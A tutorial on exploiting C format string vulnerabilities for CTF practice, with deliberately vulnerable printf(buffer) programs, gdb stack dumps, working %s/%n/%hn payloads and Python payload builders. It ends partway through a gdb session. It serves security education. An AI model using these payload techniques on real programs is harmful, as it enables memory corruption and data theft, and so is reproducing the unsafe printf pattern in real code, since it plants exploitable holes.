Exploit 101 - Format Strings



I have always had a hard time fully understanding how to exploit format string vulnerabilities. After a recent online challenge, I decided to tackle this problem and learn how to exploit them properly. Here, I'll show you various ways to write exploits for this kind of vulnerability, and I hope it will help you in your next CTF!

Note: The examples presented in this post have been tested on a 32-bit Debian system with ASLR disabled. I provide the gcc compilation arguments if you want to test them on your own.

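Watch out! The dynamic analysis has been done with PEDA for gdb. Stack addresses will be slightly different outside gdb, because the environment variables and program path stored at the top of the stack are not the same.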

Format Strings

A format string refers to a control parameter used by a class of functions in string-processing libraries (like stdio.h). The best known are the following, but there are many more.

int printf(const char *format, ...)
int fprintf(FILE *stream, const char *format, ...)
int sprintf(char *str, const char *format, ...)
int vprintf(const char *format, va_list arg)
int vsprintf(char *str, const char *format, va_list arg)

The format string specifies how the remaining arguments are rendered into a string. With printf(), the result is written to the standard output; fprintf() writes it to a stream, and sprintf()/vsprintf() store it in a buffer.

For example, the C library function int printf(const char *format, ...) sends formatted output to stdout:

printf("Color %s, number1 %d, number2 %05d, hex %#x, float %5.2f, unsigned value %u.\n",
       "red", 123456, 89, 255, 3.14159, 250);

// It will print the following line
Color red, number1 123456, number2 00089, hex 0xff, float  3.14, unsigned value 250.

As you can see, if the format string includes format specifiers (beginning with %), the additional arguments following it are formatted and inserted into the resulting string in place of their respective specifiers. There are many specifiers, including:

Specifier   Output                                      Example
d           Signed decimal integer                      392
u           Unsigned decimal integer                    7235
o           Unsigned octal                              610
x           Unsigned hexadecimal integer                7fa
f           Decimal floating point                      392.65
c           Character                                   a
s           String of characters                        sample
p           Pointer address                             b8000000
n           Nothing printed (will be explained later)
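If you want to experiment with the specifiers from the table without recompiling a C program each time, Python's printf-style % operator is a handy stand-in: for the conversions in the example above, it produces the same text as printf(). It is not a complete model, though. It supports neither %n nor the %<num>$ positional syntax, which are precisely the features the rest of this post relies on.

```python
# Python's printf-style "%" operator mirrors C's printf() for these conversions.
line = ("Color %s, number1 %d, number2 %05d, hex %#x, float %5.2f, unsigned value %u.\n"
        % ("red", 123456, 89, 255, 3.14159, 250))
print(line, end="")

# A width such as %5x is a *minimum*: short values are padded with spaces,
# long values are printed in full and never truncated.
print("[%5x]" % 0x40)        # padded to 5 characters
print("[%5x]" % 0xdeadc0de)  # 8 hex digits, wider than 5, printed as-is
```

The last two lines preview a detail that matters later: padding with a width only ever adds characters to the output.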

Here is what a normal printf() call looks like on the stack:

[Figure: the stack during a normal printf() call]

Vulnerability

The format string vulnerability can be used to read or write memory and/or execute harmful code. The problem lies in the use of unchecked user input as the format string parameter of functions that perform formatting. A malicious user may use the %s or %x format specifiers, among others, to print data from the stack or other locations in memory. You can also write arbitrary data to arbitrary locations using the %n format specifier, but we will see that later.

Here is what happens on the stack when user input is passed directly as the format string and printf() is called without any additional arguments:

[Figure: the stack when printf() is called with user input as its only argument]

Let me show you an example :

#include <stdio.h>
#include <string.h>

int main(int argc, char** argv) {

    char buffer[50];

    if (argc != 2) {
      return -1;
    }
    
    strncpy(buffer, argv[1], sizeof(buffer) - 1);
    buffer[sizeof(buffer) - 1] = '\0';  // strncpy does not always NUL-terminate
    printf(buffer);

    return 0;
}

Here, printf() receives our input as its format string and no other arguments…

$ ./demo1 blah
blah

$ ./demo1 %x.%x.%x
bfb6c8b3.32.47a5d7

$ ./demo1 %08x.%08x.%08x
bfea28ad.00000032.004665d7

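The %x specifiers are stored in buffer and interpreted by printf(), which results in reading data from the stack. For each %x, printf() fetches the next 4-byte value from the stack, where its next argument would normally be, and prints it in hexadecimal. Since we passed no arguments, it simply prints whatever happens to be there. (It is %s that treats the fetched value as an address and prints the memory it points to as a string.)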
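To make the mechanism concrete, here is a toy Python model of that behaviour. The function name leak_with_x is hypothetical, and the "stack" values are simply copied from the demo1 runs above: printf() has no way of knowing that no arguments were passed, so each %x just takes the next word.

```python
import re

def leak_with_x(fmt, stack_words):
    """Toy model of printf(fmt) called with no arguments after fmt.

    stack_words stands for the 32-bit values that happen to sit on the stack
    right after the format-string pointer. Each %x (with an optional width
    such as %08x) consumes the next word, just as if it had been passed on
    purpose. Other specifiers are not modelled.
    """
    words = iter(stack_words)

    def render(match):
        width = match.group(1)  # "" for %x, "08" for %08x
        return ("%" + width + "x") % next(words)

    return re.sub(r"%(\d*)x", render, fmt)


print(leak_with_x("%x.%x.%x", [0xbfb6c8b3, 0x32, 0x47a5d7]))
print(leak_with_x("%08x.%08x.%08x", [0xbfea28ad, 0x32, 0x4665d7]))
```

Both calls reproduce the demo1 output shown above.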

Enough for the theory, let’s do some practice !

Reading the Stack

For the first demonstration, we’ll try to read a password from the stack.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// gcc -z execstack -z norelro -fno-stack-protector -o format0 format0.c

int main(int argc, char *argv[])
{
    char pass[10] = "AABBCCDD";
    char *ptr = pass;  // pointer to the password, stored on the stack
    char buf[100];

    fgets(buf, 100, stdin);
    buf[strcspn(buf, "\n")] = '\0'; 

    if(!strncmp(pass, buf, sizeof(pass))){
        printf("Good job !\n");
        return EXIT_SUCCESS;
    } else {
        printf(buf);
        printf(" does not have access!\n");
        exit(EXIT_FAILURE);
    }

    return EXIT_SUCCESS;
}

Here, we would like to read the string ptr points to, as it is the password. First, let's run the executable.

user@gdb:~$ ./format0
%p
0xbffff67e does not have access!

Here, the %p prints the first argument printf() will find on the stack. Let’s take a look at the stack before calling printf().

[-------------------------------------code-------------------------------------]
   0x400737 <main+167>:	sub    esp,0xc
   0x40073a <main+170>:	lea    eax,[ebp-0x7a]
   0x40073d <main+173>:	push   eax
=> 0x40073e <main+174>:	call   0x4004a0 <printf@plt>
   0x400743 <main+179>:	add    esp,0x10
   0x400746 <main+182>:	sub    esp,0xc
   0x400749 <main+185>:	lea    eax,[ebx-0x1257]
   0x40074f <main+191>:	push   eax
Guessed arguments:
arg[0]: 0xbffff63e --> 0x7025 ('%p')
[------------------------------------stack-------------------------------------]
0000| 0xbffff620 --> 0xbffff63e --> 0x7025 ('%p')
0004| 0xbffff624 --> 0xbffff63e --> 0x7025 ('%p')
0008| 0xbffff628 --> 0xa ('\n')
0012| 0xbffff62c --> 0x4006a7 (<main+23>:	add    ebx,0x13ad)
0016| 0xbffff630 --> 0xbffff65e --> 0x40 ('@')
0020| 0xbffff634 --> 0x0 
0024| 0xbffff638 --> 0xb7fe5100 (<_dl_lookup_symbol_x+16>:	add    edi,0x19f00)
0028| 0xbffff63c --> 0x7025fc10 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x0040073e in main ()

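The first value on the stack (at esp) is the format argument itself, and the second one, which %p reads as printf()'s first variadic argument, happens to hold the same pointer to our input string. So, %p prints the pointer to our string: 0xbffff63e inside gdb (the run above, outside gdb, printed 0xbffff67e because the stack is shifted).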

Now, what if we want to use the pointer to the password? Well, a format specifier can select which argument it uses with the %<num>$ syntax: for example, printf("%2$x", 1, 2, 3) will print 2.

So, we just need to know where the pointer to the password is on the stack and input %<num>$s. I use %s here because we want to print the string, not the pointer. Here is the stack…

[------------------------------------stack-------------------------------------]
0000| 0xbffff620 --> 0xbffff63e --> 0x7025 ('%p')
0004| 0xbffff624 --> 0xbffff63e --> 0x7025 ('%p')
0008| 0xbffff628 --> 0xa ('\n')
0012| 0xbffff62c --> 0x4006a7 (<main+23>:	add    ebx,0x13ad)
0016| 0xbffff630 --> 0xbffff65e --> 0x40 ('@')
0020| 0xbffff634 --> 0x0 
0024| 0xbffff638 --> 0xb7fe5100 (<_dl_lookup_symbol_x+16>:	add    edi,0x19f00)
0028| 0xbffff63c --> 0x7025fc10 
0032| 0xbffff640 --> 0xbfff0000 --> 0x0 
0036| 0xbffff644 --> 0x0 
0040| 0xbffff648 --> 0xc10000 
0044| 0xbffff64c --> 0x0 
0048| 0xbffff650 --> 0xb7fff000 --> 0x23f40 
0052| 0xbffff654 --> 0xb7fff920 --> 0x400000 --> 0x464c457f 
0056| 0xbffff658 --> 0xbffff670 --> 0xffffffff 
0060| 0xbffff65c --> 0x400306 ("__libc_start_main")
0064| 0xbffff660 --> 0x0 
0068| 0xbffff664 --> 0xbffff704 --> 0xf28a634d 
0072| 0xbffff668 --> 0xb7fcb000 --> 0x1b2db0 
0076| 0xbffff66c --> 0xd ('\r')
0080| 0xbffff670 --> 0xffffffff 
0084| 0xbffff674 --> 0xb7fcb000 --> 0x1b2db0 
0088| 0xbffff678 --> 0xb7e24e18 --> 0x2bb6 
0092| 0xbffff67c --> 0xb7fd5858 --> 0xb7e18000 --> 0x464c457f 
0096| 0xbffff680 --> 0xb7fcb000 --> 0x1b2db0 
0100| 0xbffff684 --> 0xbffff764 --> 0xbffff886 ("/home/user/format0")
0104| 0xbffff688 --> 0xb7ffed00 --> 0x0 
0108| 0xbffff68c --> 0x40000 
0112| 0xbffff690 --> 0x0 
0116| 0xbffff694 --> 0x401a54 --> 0x1948 
0120| 0xbffff698 --> 0x1 
0124| 0xbffff69c --> 0x4007bb (<__libc_csu_init+75>:	add    edi,0x1)
0128| 0xbffff6a0 --> 0x41410001 
0132| 0xbffff6a4 ("BBCCDD")
0136| 0xbffff6a8 --> 0x4444 ('DD')
0140| 0xbffff6ac --> 0xbffff6a2 ("AABBCCDD") ; Here is the pointer
0144| 0xbffff6b0 --> 0xbffff6d0 --> 0x1 
0148| 0xbffff6b4 --> 0x0 
0152| 0xbffff6b8 --> 0x0 

As you can see, the string pointer sits at byte offset 140 from the top of the stack, which makes it argument 35 (140 / 4 = 35). To read it, we enter the following string:
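Counting slots by eye is error-prone, so the arithmetic is worth writing down. A minimal sketch, assuming a 32-bit target where every argument occupies one 4-byte slot and esp is the stack pointer at the call to printf() (it holds the format-string pointer, so argument N lives at esp + 4*N). The helper name arg_index is hypothetical.

```python
def arg_index(esp, addr, word_size=4):
    """Return N such that %N$... reads the stack slot at addr.

    esp is the stack pointer at the call to printf(); the slot at esp holds
    the format string itself, so argument N is at esp + N * word_size.
    """
    offset = addr - esp
    if offset <= 0 or offset % word_size:
        raise ValueError("address is not an argument slot above esp")
    return offset // word_size


# Password pointer in format0: 0xbffff6ac - 0xbffff620 = 140 bytes
print(arg_index(0xbffff620, 0xbffff6ac))
```

The same formula works for every gdb stack dump in this post, as long as you take esp from the breakpoint on the call to printf().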

user@gdb:~$ ./format0
%35$s
AABBCCDD does not have access!

user@gdb:~$ ./format0
AABBCCDD
Good job !
user@gdb:~$ 

Easy, right ?

Writing to the Stack

Now you know how to read a specific argument on the stack, but we would like to go further and write to the stack! Let's take another example:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

// gcc -z execstack -z norelro -fno-stack-protector -o format1 format1.c

int main(int argc, char *argv[])
{
    int target = 0xdeadc0de;
    char buffer[64];

    fgets(buffer, 64, stdin);
    printf(buffer);

    if(target == 0xcafebabe) {
        printf("Good job !\n");
        return EXIT_SUCCESS;
    } else {
        printf("Nope...\n");
        exit(EXIT_FAILURE);
    }
}

The goal here is to modify the target variable. It must be equal to 0xcafebabe. To do that, there is another interesting format specifier: %n. According to the printf() man page, here is what %n should do :

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.

Hmm, it's a bit cryptic… Basically, %n writes the number of characters printed so far to the address given by its corresponding argument. For example, with the input AAAA%n, printf() has printed 4 characters ("AAAA") when it reaches %n, so it writes the value 4 to the address it takes from the stack as the argument for %n. But where on the stack does %n take that address from?

Well, let’s try to submit AAAA%n into the program :

// Check the pointer
$ ./format1
AAAA.%p       
AAAA.0x40
Nope...

// Write 
$ ./format1
AAAA.%n
Segmentation fault

Oops, segfault… Why? printf() took the next value on the stack, 0x40 (the same one %p printed above), as the pointer for %n and tried to write 5 (the number of characters printed before it, "AAAA.") at address 0x40, which is not mapped, so the program crashes.

To solve the challenge, you have to remember 2 things :

  • You control the input
  • We can specify a position to read/write on the stack with %<num>$n

So, instead of a simple %n, we can use %<num>$n to choose which stack slot provides the address to write to. What would happen if %<num>$n pointed to the start of our own string? Well, it would use the address at the beginning of our string as the place to write the data.

First, to write 0xcafebabe into target, we have to find where target is on the stack.

[------------------------------------stack-------------------------------------]
0000| 0xbffff650 --> 0xbffff66c ("AAAA\n")
0004| 0xbffff654 --> 0x40 ('@')
0008| 0xbffff658 --> 0xb7fcb5a0 --> 0xfbad2288 
0012| 0xbffff65c --> 0x400637 (<main+23>:	add    ebx,0x1351)
0016| 0xbffff660 --> 0x0 
0020| 0xbffff664 --> 0xbffff704 --> 0x7d074f84 
0024| 0xbffff668 --> 0xb7fcb000 --> 0x1b2db0 
0028| 0xbffff66c ("AAAA\n")
0032| 0xbffff670 --> 0xffff000a 
0036| 0xbffff674 --> 0xb7fcb000 --> 0x1b2db0 
0040| 0xbffff678 --> 0xb7e24e18 --> 0x2bb6 
0044| 0xbffff67c --> 0xb7fd5858 --> 0xb7e18000 --> 0x464c457f 
0048| 0xbffff680 --> 0xb7fcb000 --> 0x1b2db0 
0052| 0xbffff684 --> 0xbffff764 --> 0xbffff885 ("/home/user/format1")
0056| 0xbffff688 --> 0xb7ffed00 --> 0x0 
0060| 0xbffff68c --> 0x40000 
0064| 0xbffff690 --> 0x0 
0068| 0xbffff694 --> 0x401988 --> 0x187c 
0072| 0xbffff698 --> 0x1 
0076| 0xbffff69c --> 0x40070b (<__libc_csu_init+75>:	add    edi,0x1)
0080| 0xbffff6a0 --> 0x1 
0084| 0xbffff6a4 --> 0xbffff764 --> 0xbffff885 ("/home/user/format1")
0088| 0xbffff6a8 --> 0xbffff76c --> 0xbffff898 ("LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc"...)
0092| 0xbffff6ac --> 0xdeadc0de ; Here is the pointer
0096| 0xbffff6b0 --> 0xbffff6d0 --> 0x1 
0100| 0xbffff6b4 --> 0x0 
0104| 0xbffff6b8 --> 0x0 
0108| 0xbffff6bc --> 0xb7e30286 (<__libc_start_main+246>:	add    esp,0x10)
0112| 0xbffff6c0 --> 0x1 
0116| 0xbffff6c4 --> 0xb7fcb000 --> 0x1b2db0 
[------------------------------------------------------------------------------]

It seems that target sits at 0xbffff6ac, the 23rd argument slot on the stack. We want to replace the value at 0xbffff6ac, but how do we give %n this address?

As I said earlier, if we can find where our "AAAA" lands on the stack, we can replace AAAA with the address we want to write to. Just recheck the stack: "AAAA" is at 0xbffff66c, which is the 7th argument.

$ ./format1
AAAA%7$p
AAAA0x41414141
Nope...

So, the following input, \xac\xf6\xff\xbf%7$n, should write 4 at 0xbffff6ac (the four address bytes are the only characters printed before %7$n). Let me show you…
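The python -c one-liners in this post use Python 2's print statement, which writes the raw bytes of a str. If you only have Python 3, a minimal equivalent builds the payload as bytes instead, using struct.pack("<I", ...) to lay out the address in little-endian order. The helper name write_payload is hypothetical.

```python
import struct

def write_payload(addr, arg_index):
    """Payload that makes %<arg_index>$n write to addr.

    "<I" packs a little-endian unsigned 32-bit integer, so 0xbffff6ac
    becomes b"\xac\xf6\xff\xbf", exactly the bytes typed by hand above.
    """
    return struct.pack("<I", addr) + b"%" + str(arg_index).encode() + b"$n"


payload = write_payload(0xbffff6ac, 7)
print(payload)
```

To feed it to the program, write it to standard output's binary buffer in a script, for instance sys.stdout.buffer.write(payload + b"\n"), and redirect that into ./format1 as in the gdb runs.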

gdb-peda$ b *0x00400665 ; Break @printf()
Breakpoint 1 at 0x400665
gdb-peda$ b *0x0040066a ; Break right after printf()
Breakpoint 2 at 0x40066a
gdb-peda$ run < <(python -c 'print "\xac\xf6\xff\xbf" + "%7$n"')
Starting program: /home/user/format1 < <(python -c 'print "\xac\xf6\xff\xbf" + "%7$n"')

[-------------------------------------code-------------------------------------]
   0x40065e <main+62>:	sub    esp,0xc
   0x400661 <main+65>:	lea    eax,[ebp-0x4c]
   0x400664 <main+68>:	push   eax
=> 0x400665 <main+69>:	call   0x400450 <printf@plt>
   0x40066a <main+74>:	add    esp,0x10
   0x40066d <main+77>:	cmp    DWORD PTR [ebp-0xc],0xcafebabe
   0x400674 <main+84>:	jne    0x40068f <main+111>
   0x400676 <main+86>:	sub    esp,0xc

Breakpoint 1, 0x00400665 in main ()
gdb-peda$ x/x 0xbffff6ac ; Check the value @ 0xbffff6ac
0xbffff6ac:	0xdeadc0de
gdb-peda$ continue
Continuing.
????

[-------------------------------------code-------------------------------------]
   0x400661 <main+65>:	lea    eax,[ebp-0x4c]
   0x400664 <main+68>:	push   eax
   0x400665 <main+69>:	call   0x400450 <printf@plt>
=> 0x40066a <main+74>:	add    esp,0x10
   0x40066d <main+77>:	cmp    DWORD PTR [ebp-0xc],0xcafebabe
   0x400674 <main+84>:	jne    0x40068f <main+111>
   0x400676 <main+86>:	sub    esp,0xc
   0x400679 <main+89>:	lea    eax,[ebx-0x1248]


Breakpoint 2, 0x0040066a in main ()
gdb-peda$ x/x 0xbffff6ac ; Check the value @ 0xbffff6ac (again)
0xbffff6ac:	0x00000004

Nice! But we don't want to write 4, we want to write 0xcafebabe. Here we have two issues. First, since printing 4 characters makes %n write 4, writing 0xcafebabe would require printing 3405691582 (0xcafebabe in decimal) characters, and we certainly can't type that many into a 64-byte buffer… impossible!

But here is a trick: AAAA%<value-4>x%7$n (it's value-4 because 4 characters, AAAA, have already been printed). For example, AAAA%96x%7$n will write the value 100 at the address 0x41414141. Why? Because %96x prints its argument padded with spaces to a minimum width of 96 characters, so 4 + 96 = 100 characters have been printed when %7$n runs.
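The padding arithmetic is easy to script. The sketch below (padded_write is a hypothetical helper) builds address + %<pad>x + %<arg_index>$n. It assumes pad is at least 8: %<pad>x prints at least pad characters, and a 32-bit argument never needs more than 8 hex digits, so the width alone decides the count. It reproduces the AAAA%96x%7$n example and also the payload used in the Precision Write exercise further down.

```python
import struct

def padded_write(addr, value, arg_index):
    """Payload making %<arg_index>$n store value at addr (single %n write).

    Layout: 4 address bytes, then %<pad>x, then %<arg_index>$n.
    Requiring pad >= 8 guarantees %<pad>x prints exactly pad characters.
    """
    prefix = struct.pack("<I", addr)  # little-endian address bytes
    pad = value - len(prefix)         # characters still needed after the address
    if pad < 8:
        raise ValueError("value too small for this simple layout")
    return prefix + b"%%%dx%%%d$n" % (pad, arg_index)


print(padded_write(0x41414141, 100, 7))
```

Nothing stops you from calling it with 0xcafebabe, but the resulting pad of 3405691578 is exactly the second problem described next.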

$ ./format1
%x
40
Nope...
$ ./format1
%20x
                  40 # See the padding ?
Nope...

Watch out! It's %<Y>x, NOT %<Y>$x. The first one pads the next argument to a width of Y characters, whereas the second one prints the Yth argument.

The second issue is that you don't want to do AAAA%3405691578x%7$n, because it would print more than 3.4 GB of padding to the standard output, which would take forever! So, instead of writing one int (4 bytes), we'll write two shorts (2 bytes each). To do that, we'll use another specifier: %hn, where the h length modifier makes %n store the count into a short instead of an int.

Let’s break this down :

  • We want to write 0xcafebabe. That means 0xcafe (51966 in decimal) in the high-order bytes and 0xbabe (47806 in decimal) in the low-order bytes.
  • We want to write those values at 0xbffff6ac. On little-endian x86, that means writing 0xcafe at 0xbffff6ac + 2 = 0xbffff6ae (high order) and 0xbabe at 0xbffff6ac (low order).

Now, we have to figure out the value to set for the padding. Here is the formula :

[The value we want] - [The number of characters already printed] = [The padding to use]

Let’s start with the low order bytes :

It will be 47806 - 8 = 47798, because 8 characters have already been printed (the two 4-byte addresses).

Then, the high order bytes :

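It will be 51966 - 47806 = 4160, because 47806 characters have already been printed (the two 4-byte addresses plus the 47798 padding characters). Note that this only works because 0xbabe is smaller than 0xcafe: the counter can only go up, so the smaller half must be written first.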

Now we can construct the exploit :

It’ll be : \xac\xf6\xff\xbf\xae\xf6\xff\xbf%47798x%7$hn%4160x%8$hn. Let me explain :

  • \xac\xf6\xff\xbf or 0xbffff6ac (in reverse order) points to the low order bytes.
  • \xae\xf6\xff\xbf or 0xbffff6ae (in reverse order) points to the high order bytes.
  • %47798x will print 47798 characters on the standard output.
  • %7$hn will write 8 + 47798 = 47806 (or 0xbabe) at the first address specified (0xbffff6ac).
  • %4160x will print 4160 more characters on the standard output.
  • %8$hn will write 8 + 47798 + 4160 = 51966 (or 0xcafe) at the second address specified (0xbffff6ae).
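The same bookkeeping generalizes to any 32-bit value: split it into two 16-bit halves, write the smaller half first (the character counter can only go up), and pad by the difference each time. Here is a sketch of such a builder; hn_payload is a hypothetical name, and it assumes the payload starts at argument arg_index, so the two 4-byte addresses occupy arguments arg_index and arg_index + 1. As before, each padding must be 0 or at least 8 so that %<pad>x prints exactly pad characters.

```python
import struct

def hn_payload(addr, value, arg_index):
    """Payload writing the 32-bit value at addr with two %hn writes."""
    # (half, where it goes): low half at addr, high half at addr + 2,
    # sorted so the smaller half is written first.
    writes = sorted([(value & 0xffff, addr), ((value >> 16) & 0xffff, addr + 2)])
    payload = b"".join(struct.pack("<I", where) for _, where in writes)
    printed = len(payload)  # the 8 address bytes are printed first
    for i, (half, _) in enumerate(writes):
        pad = half - printed
        if pad >= 8:
            payload += b"%%%dx" % pad
        elif pad != 0:
            raise ValueError("halves too close together for this simple layout")
        payload += b"%%%d$hn" % (arg_index + i)
        printed = half
    return payload


print(hn_payload(0xbffff6ac, 0xcafebabe, 7))
```

For 0xcafebabe at 0xbffff6ac with the buffer at argument 7, it produces exactly the string built by hand above.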

Let’s try that in GDB.

gdb-peda$ b *0x00400665 ; Break @printf()
Breakpoint 1 at 0x400665
gdb-peda$ b *0x0040066a ; Break right after printf()
Breakpoint 2 at 0x40066a
gdb-peda$ run < <(python -c 'print "\xac\xf6\xff\xbf\xae\xf6\xff\xbf%47798x%7$hn%4160x%8$hn"')
Starting program: /home/user/format1 < <(python -c 'print "\xac\xf6\xff\xbf\xae\xf6\xff\xbf%47798x%7$hn%4160x%8$hn"')

Breakpoint 1, 0x00400665 in main ()
gdb-peda$ x/x 0xbffff6ac
0xbffff6ac:	0xdeadc0de ; Before printf()
gdb-peda$ conti
Continuing.
????????   

Breakpoint 2, 0x0040066a in main ()
gdb-peda$ x/x 0xbffff6ac
0xbffff6ac:	0xcafebabe ; After printf()          

gdb-peda$ conti
Continuing.
Good job !
[Inferior 1 (process 1118) exited normally]
Warning: not running or target is remote          

Done ! It’s not that easy to grasp the concept but with some practice you’ll get it !

Use Cases

We got the concept. Now, we’ll try some practical exercises to make sure you master this skill !

Random Write

Let's start with a simple one. Here we have a global target variable, and the goal is to replace its value with anything non-zero to make the condition true. FYI, uninitialized global variables are set to 0.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

// gcc -static -z execstack -z norelro -fno-stack-protector -o format1 format1.c
// Ref. https://exploit-exercises.com/protostar/format1/

int target;

void vuln(char *string)
{
  printf(string);
  
  if(target) {
      printf("you have modified the target :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}

As target is a global variable (declared outside any function) with no initializer, it will be located in the .bss section of the binary. We can find it easily using the following command:

$ objdump -t ./format1 | grep target
080ebaa0 g     O .bss	00000004 target

Now, we have to find at which offset our argument (in fact, our input) will be on the stack. We can bruteforce that easily:

$ ./format1 AAAA%x.%x.%x.%x.%x.%x%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x

AAAAbffff5e0.1.80489b8.2.8048190.bffff5088048a1e.bffff6fb.49656e69.0.8048a06.80ea110.bffff520.0.8048c5e.80ea0bc.49656e69.0.8048c5e.2.bffff5d4.bffff5e0.bffff544.0.2.bffff5d4.80489f0.0.8048190.80ea0bc.49656e69.0.65a8ab54.935aa23b.0.0.0.0.0.0.756e6547.1.8048ff4.8049580.8049620.0.bffff5cc.6.3c.3.30.0.2.0.8048880.80489f0.2.bffff5d4.8049580.8049620.0.bffff5cc.0.2.bffff6f1.bffff6fb.0.bffff8a1.bffffe5d.bffffe91.bffffea2bffffeb5.bffffebf.bffffed3.bffffee3.bfffff05.bfffff18.bfffff2c.bfffff40.bfffff50.bfffff58.bfffff6a.bfffff77.bfffff96.bfffffd4.bfffffe6.0.20.b7ffecf0.21.b7ffe000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.5.7.0.8.0.9.804885f.b.3e8.c.3e8.d.3e8.e.3e8.17.0.19.bffff6db.1f.bffffff2.f.bffff6eb.0.0.0.0.df000000.75be3dcc.ba15cd21.c9285987.69096277.363836.662f2e00.616d726f.41003174.25414141.78252e78

Well, it seems that our AAAA straddles arguments 141 and 142 (it is not 4-byte aligned):

$ ./format1 AAAA%141\$p
AAAA0x41410031
$ ./format1 AAAA%142\$p
AAAA0x31254141

That's not really a problem; we just need to add a couple of characters to shift the alignment…

$ ./format1 AAAABB%141\$p
AAAABB0x41414141

Now, we have to replace the A’s with the address of target.

$ ./format1 `python -c 'print "\xa0\xba\x0e\x08BB%141\$n"'`
?BByou have modified the target :)

Ok, that was an easy one !

Precision Write

This exercise is similar to the first one, but this time we have to write exactly 64 into target.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

// gcc -static -z execstack -z norelro -fno-stack-protector -o format2 format2.c

void vuln()
{
  int target = 0;
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);
  printf(buffer);
  
  if(target == 64) {
      printf("you have modified the target !\n");
  } 
}

int main(int argc, char **argv)
{
  vuln();
}

First, let’s find our argument on the stack…

$ ./format2 
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
AAAA00000200.080ea400.080489bb.00000000.00000000.00000000.41414141.78383025.3830252e
user@gdb:~/demo$ ./format2 
AAAA%7$p
AAAA0x41414141
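Counting the fields by hand works, but a tiny helper can do it for you. find_offset below is hypothetical (not part of any tool): paste the output of an AAAA%08x.%08x... run and it returns the 1-based index of the field that reads 41414141. If it returns None, the marker is probably misaligned, as in the Random Write exercise, and you need to add a couple of padding characters.

```python
def find_offset(leak, prefix="AAAA", marker="41414141"):
    """Return the 1-based argument index whose %08x dump equals marker.

    leak is the program's output for prefix + "%08x.%08x...": the prefix is
    echoed first, then one dot-separated field per stack argument.
    """
    if leak.startswith(prefix):
        leak = leak[len(prefix):]
    for index, field in enumerate(leak.split("."), start=1):
        if field == marker:
            return index
    return None


leak = "AAAA00000200.080ea400.080489bb.00000000.00000000.00000000.41414141.78383025.3830252e"
print(find_offset(leak))
```

With the format2 output above it returns 7, which the AAAA%7$p check confirms.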

It seems to be the 7th argument. Now we need to find the address of target and write 64 at this address. Let’s run GDB and place a breakpoint at the if condition.

$ gdb -q format2 
Reading symbols from format2...(no debugging symbols found)...done.
gdb-peda$ disas vuln
Dump of assembler code for function vuln:
   0x080489ac <+0>:	push   ebp
   0x080489ad <+1>:	mov    ebp,esp
   0x080489af <+3>:	push   ebx
   0x080489b0 <+4>:	sub    esp,0x214
   0x080489b6 <+10>:	call   0x8048890 <__x86.get_pc_thunk.bx>
   0x080489bb <+15>:	add    ebx,0xa16f5
   0x080489c1 <+21>:	mov    DWORD PTR [ebp-0xc],0x0
   0x080489c8 <+28>:	mov    eax,0x80ea55c
   0x080489ce <+34>:	mov    eax,DWORD PTR [eax]
   0x080489d0 <+36>:	sub    esp,0x4
   0x080489d3 <+39>:	push   eax
   0x080489d4 <+40>:	push   0x200
   0x080489d9 <+45>:	lea    eax,[ebp-0x20c]
   0x080489df <+51>:	push   eax
   0x080489e0 <+52>:	call   0x804f5f0 <fgets>
   0x080489e5 <+57>:	add    esp,0x10
   0x080489e8 <+60>:	sub    esp,0xc
   0x080489eb <+63>:	lea    eax,[ebp-0x20c]
   0x080489f1 <+69>:	push   eax
   0x080489f2 <+70>:	call   0x804f1d0 <printf>
   0x080489f7 <+75>:	add    esp,0x10
   0x080489fa <+78>:	cmp    DWORD PTR [ebp-0xc],0x40 ; Right here !
   0x080489fe <+82>:	jne    0x8048a12 <vuln+102>
   0x08048a00 <+84>:	sub    esp,0xc
   0x08048a03 <+87>:	lea    eax,[ebx-0x2da08]
   0x08048a09 <+93>:	push   eax
   0x08048a0a <+94>:	call   0x804fa00 <puts>
   0x08048a0f <+99>:	add    esp,0x10
   0x08048a12 <+102>:	nop
   0x08048a13 <+103>:	mov    ebx,DWORD PTR [ebp-0x4]
   0x08048a16 <+106>:	leave  
   0x08048a17 <+107>:	ret    
End of assembler dump.
gdb-peda$ break *0x080489fa
Breakpoint 1 at 0x80489fa
gdb-peda$ run
Starting program: /home/user/demo/format2 
TEST   
TEST

[----------------------------------registers-----------------------------------]
EAX: 0x5 
EBX: 0x80ea0b0 --> 0x0 
ECX: 0x80eddf8 ("TEST\n")
EDX: 0x80eb574 --> 0x0 
ESI: 0x80ea0bc --> 0x80680c0 (<__strcpy_sse2>:	mov    edx,DWORD PTR [esp+0x4])
EDI: 0x49656e69 ('ineI')
EBP: 0xbffff668 --> 0xbffff678 --> 0x0 
ESP: 0xbffff450 --> 0x0 
EIP: 0x80489fa (<vuln+78>:	cmp    DWORD PTR [ebp-0xc],0x40)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
